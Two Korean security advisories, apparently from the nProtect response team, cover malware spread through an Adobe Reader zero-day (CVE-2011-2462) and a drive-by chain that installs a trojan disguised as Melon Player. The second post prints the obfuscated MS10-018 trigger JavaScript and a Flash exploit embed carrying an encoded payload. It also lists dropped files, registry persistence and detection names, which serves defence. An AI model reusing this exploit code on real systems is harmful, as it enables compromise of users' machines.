1. 개 요 


최근 Adobe측에서 새로운 Zero Day 취약점(CVE-2011-2462)에 관한 사항을 공개하였고, 이와 관련해 해당 취약점을 악용한 악성파일의 유포 정황이 확인되면서 사용자들의 각별한 주의가 요망되고 있다. Zero Day 취약점을 이용한 악성파일이 최근 트렌드화 되어 있는 사회공학 기법과 결합될 경우 다양한 범위에서 감염 및 피해 상황을 유발 할 수 있으며, Zero Day 취약점의 특성상 보안 패치가 발표되기 전까지는 제품 스스로의 보안성을 기대할 수 없다. 때문에 이러한 악성파일의 경우 사용자들 스스로 감염을 사전에 차단할 수 있도록 각별히 주의를 기울이는 것이 무엇보다 중요하다.

[Security Advisory for Adobe Reader and Acrobat]

☞ 
http://www.adobe.com/support/security/advisories/apsa11-04.html

[영향을 받는 소프트웨어 버전]

☞ Adobe Reader X (10.1.1) 버전 및 10.x 하위 버전 (Windows, Macintosh)
☞ Adobe Reader 9.4.6 버전 및 9.x 하위 버전 (Windows, Macintosh, UNIX)
☞ Adobe Acrobat X (10.1.1) 버전 및 10.x 하위 버전 (Windows, Macintosh)
☞ Adobe Acrobat 9.4.6 버전 및 9.x 하위 버전 (Windows, Macintosh)

  

2. 유포 경로 및 감염 증상


이번에 발견된 CVE-2011-2462 취약점을 악용한 악성파일은 PDF 형태로 이메일의 첨부파일이나, 특정 링크 접속 등을 통해 유포될 수 있다. 또한, 감염될 경우 U3D 메모리 변조로 인한 취약점에 노출되어 시스템 제어권을 공격자에게 허용할 수 있다고 알려졌다.

※ U3D(Universal 3D) 란?

☞ 3D 컴퓨터 그래픽 데이터에 대한 압축 파일 포멧


해당 악성 PDF 파일은 정상 PDF 파일에 취약점을 악용한 ShellCode가 삽입된 형태이며, 내부 내용은 아래의 그림과 같이 특정 회사의 내부 직원 만족도 조사의 내용처럼 구성되어 있는 것으로 알려져 있다.

해당 악성 PDF 파일이 실행되면 내부적으로 악성 ShellCode가 실행되며, 위 그림과 같은 정상적인 내용의 PDF 파일을 화면상에 출력하여 사용자를 속일 수 있다. 또한, 해당 악성 PDF 파일은 아래와 같은 추가적인 악성파일을 생성할 수 있다.

※ 생성 파일

☞ C:\Documents and Settings\(사용자 계정)\Local Settings\pretty.exe
☞ C:\Documents and Settings\(사용자 계정)\Local Settings\WSE4EF1.TMP
☞ C:\Documents and Settings\(사용자 계정)\Local Settings\ctfmon.exe (pretty.exe와 동일한 파일)

위와 같이 생성된 추가적인 악성파일들은 외부의 C&C 서버와 지속적인 통신을 시도하는 것으로 알려졌으나, 현재는 해당 사이트가 모두 막혀있는 상태이다.

3. 예방 조치 방법

현재 Adobe 측에서는 해당 취약점과 관련해 다음주인 2011년 12월 12일경 Windows용 Adobe Reader 9.x, Adobe Acrobat 9.x 제품에 대한 보안 패치를 제공할 예정이라고 한다. 다만, Adobe Reader X, Adobe Acrobat X 제품의 경우 각각 보호모드와 보호뷰 기능을 통해 취약점을 통한 감염을 예방할 수 있어 해당 제품의 보안 패치는 2012년 1월 10일경 이루어질 것이라고 발표하였다.

아직까지 해당 취약점에 대한 확실한 보안패치가 이루어지지 않았기때문에 일반 사용자들은 반드시 아래와 같은 "보안 관리 수칙"을 준수하여 해당 취약점에 의한 피해를 사전에 예방할 수 있도록 하자.

※ 보안 관리 수칙

1. 윈도우와 같은 OS 및 각종 응용프로그램에 대한 최신 보안패치를 생활화.

2. 신뢰할 수 있는 보안 업체에서 제공하는 백신을 항상 최신 엔진 및 패턴 버전으로 업데이트하여 실시간 감시 기능을 "ON" 상태로 유지해 사용.

3. 출처가 불분명한 이메일의 첨부파일에 대한 다운로드를 지양.

4. SNS 이용시 출처가 불분명한 링크의 경우 해당 링크 접속 주의.

※ 잉카인터넷(시큐리티대응센터/대응팀)에서는 이러한 사회공학 기법을 악용한 여러 보안 위협에 대비해 24시간 지속적인 대응체계를 유지하고 있다.

 

저작자 표시
신고
Posted by nProtect
1. 개 요


최근 Flash Player 취약점을 이용해 추가적인 악성파일 다운로드 및 실행을 시도하는 형태의 악성파일 유포 기법이 기승을 부리고 있다. 이러한 취약점을 악용한 악성파일에 감염되면 사용자들이 인지하지 못하는 상태에서 여러 형태의 악성 동작을 유발할 수 있기 때문에 각별한 주의가 요망되고 있다. 또한, 해당 취약점을 악용하는 악성파일 감염에 의해 다운로드 될 수 있는 추가적인 악성파일은 이번 글을 통해 언급될 파일처럼 국내 유명 음악 서비스 플레이어로 위장하는 경우도 있으며, 현재도 지속적으로 유포중에 있다.

[주의]윈도우 시스템 파일을 교체하는 악성파일 변종 증가
http://erteam.nprotect.com/173

[주의]국내 소셜커머스 웹 사이트 변조로 악성파일 다량 전파
http://erteam.nprotect.com/170

2. 감염 경로 및 증상

국내 유명 음악 서비스 플레이어로 위장한 악성파일은 Flash Player 취약점(CVE-2011-2110)을 악용하는 SWF 악성파일에 의해 추가적으로 다운로드 되어 사용자들의 PC에 설치될 수 있다.

최초 유포는 아래의 URL과 같이 특정사이트에 삽입된 스크립트 파일에 의해 시작되었으며 Internet Explorer, Adobe Flash Player 버전 등을 체크하여 추가적인 동작을 진행하게 된다.

※ Melon Player 악성파일 유포를 위한 악성 스크립트

  - http://(생략)/share/a1.html

◆ 악성 스크립트가 포함된 html, SWF 파일

아래의 그림은 a1.html 파일의 내부 코드이며 IE, Flash Player 버전 정보 체크, 각 버전에 따른 SWF 파일 매칭 실행 등에 대한 루틴을 보여주고 있다.

 


아래의 URL은 추가적으로 다운로드 될 수 있는 악성 스크립트 파일에 대한 목록이다.

※ 추가 악성 스크립트 파일 다운로드 URL 목록

  - http://(생략)/share/a1.html
  - http://(생략)/share/a2.html (MS10-018 취약점)
  - http://(생략)/share/a3.html (CVE-2011-2110 취약점)

a2.html, a3.html 파일은 각각 내부에 MS10-018 취약점,  CVE-2011-2110 취약점 활용 코드를 가지고 있다.
  

■ MS10-018 취약점 (a2.html)


function sclick()
{
var zmaqwekjsax = document.createElement("B"+"O"+"D"+"Y");
zmaqwekjsax.addBehavior("#"+"d"+"e"+"f"+"a"+"u"+"l"+"t"+"#"+"u"+"s"+"e"+"r"+"Da"+"t"+"a");
document.appendChild(zmaqwekjsax);
try
{
for (i=0;i<10;i++)
{
zmaqwekjsax.setAttribute('s',window);
}
}
catch(e)
{}
window.status+='';
}

■ CVE-2011-2110 취약점 (a3.html)


<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="550" height="400" id="test" align="middle">
    <param name="movie" value="basic.swf?info=02E6B(생략)B51D3527B7AF28B7394" />
    <param name="quality" value="high" />
    <param name="bgcolor" value="#ffffff" />
    <param name="play" value="true" />
    <param name="loop" value="true" />
    <param name="wmode" value="window" />
    <param name="scale" value="showall" />
    <param name="menu" value="true" />
    <param name="devicefont" value="false" />
    <param name="salign" value="" />
    <param name="allowScriptAccess" value="sameDomain" />
    <!--[if !IE]>-->
    <object type="application/x-shockwave-flash" data="basic.swf?info=02E6B(생략)B7394" width="550" height="400">
     <param name="movie" value="basic.swf?info=02E6B(생략)B51D3527B7AF28B7394" />
     <param name="quality" value="high" />
     <param name="bgcolor" value="#ffffff" />
     <param name="play" value="true" />
     <param name="loop" value="true" />
     <param name="wmode" value="window" />
     <param name="scale" value="showall" />
     <param name="menu" value="true" />
     <param name="devicefont" value="false" />
     <param name="salign" value="" />
     <param name="allowScriptAccess" value="sameDomain" />


아래의 그림은 악성 스크립트에 의해 실행될 수 있는 악성 코드를 포함한 SWF 파일의 내부 코드이다. 또한, 내부에 포함된 각각의 Shellcode 정보(라이브러리 로드, Melon Player 위장 악성파일 다운로드)를 디코딩한 화면과 함께 보여주고 있다.


※ Adobe Flash Player 최신 보안 패치 URL

http://www.adobe.com/go/getflash


◆ Melon Player 3.0 으로 위장한 악성파일

취약점을 사용한 악성 스크립트 및 SWF 파일에 의해 최종적으로 "fatt.txt" 파일이 다운로드 된다. 해당 파일은 txt 형식의 파일로 보일 수 있으나 복호화 과정을 거친 후 최종적으로 감염이 가능한 exe형태의 파일로 변환된다.

아래의 그림은 Melon Player 3.0 으로 위장한 악성파일과 정상 Melon Player 설치본에 대한 속성 비교 화면이다.

 

정상 Melon Player 설치본은 위 그림과 같이 "MelonSetup"이라는 파일명을 가지며, 통합적 설치본이기 때문에 별도의 버전 설명 부분을 참조하지 않고 있다.

복호화 과정을 거친 "fatt.txt"파일에 감염되면 아래의 설명 부분과 같이 자신의 복사본을 생성하게 되며, 추가적인 레지스트리 값 등록이 진행될 수 있다.

※ 생성 파일

  - C:\WINDOWS\winntp\cr.exe (239,108 바이트)

※ 레지스트리 값 등록

  - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  - 이   름 : HKLM
  - 데이터 : "C:\WINDOWS\winntp\cr.exe"


또한, 해당 파일이 실행되면 아래의 그림과 같이 외부 사이트와 지속적인 세션 연결 상태를 유지하여 경우에 따라서 백도어 기능, 추가적인 악성파일 다운로드, 수집된 정보의 발송 등과 같은 역할(?)을 수행할 수 있다.


3. 예방 조치 방법

위와 같이 취약점을 이용하는 악성파일의 경우 최근 특정 온라인 게임 계정 정보 탈취를 목적으로 하는 악성파일을 중심으로 다양한 변종이 지속적으로 유포되는 양상을 보이고 있다. 주로 웹 하드 , 각종 커뮤니티 , 소셜커머스 사이트 등을 주요 유포 경로로 하고 있어 다양한 범위의 유포 분포도를 보이고 있으며, 일반 사용자 몰래 동작되기 때문에 감염 사실을 인지하기가 어렵다는 점이 특징이다.

이러한 악성파일로 부터 안전하기 위해서는 아래와 같은 "보안 관리 수칙"을 준수하는 등 사용자 스스로 주의와 관심을 가지는 것이 무엇보다 중요하다고 할 수 있다.

※ 보안 관리 수칙

1. 윈도우와 같은 OS 및 각종 응용 프로그램의 최신 보안 패치 생활화.

2. 신뢰할 수 있는 보안업체에서 제공하는 백신을 최신 엔진 및 패턴버전으로 업데이트해 실시간 감시 기능을 항상 "ON"상태로 유지하여 사용한다.

3. 출처가 불분명한 이메일에 대한 열람 및 첨부파일에 대한 다운로드/실행을 자제한다.

4. 인스턴트 메신저, SNS 등을 통해 접근이 가능한 링크 접속시 주의


※ 잉카인터넷(시큐리티대응센터/대응팀)에서는 위와 같은 악성파일에 대해 아래와 같은 진단/치료 기능을 제공하고 있으며, 각종 보안 위협에 대비하기 위해 24시간 지속적인 대응체계를 유지하고 있다.

◆ 진단명

- Script-JS/W32.Agent.AAD
- Script-JS/W32.Agent.CGF
- Script-JS/W32.Agent.CHI
- Trojan-Exploit/W32.SWFlash.3436
- Trojan-Exploit/W32.SWFlash.3437.B
- Trojan/W32.Buzus.239108
- Trojan/W32.Buzus.239108




 

저작자 표시
신고
Posted by nProtect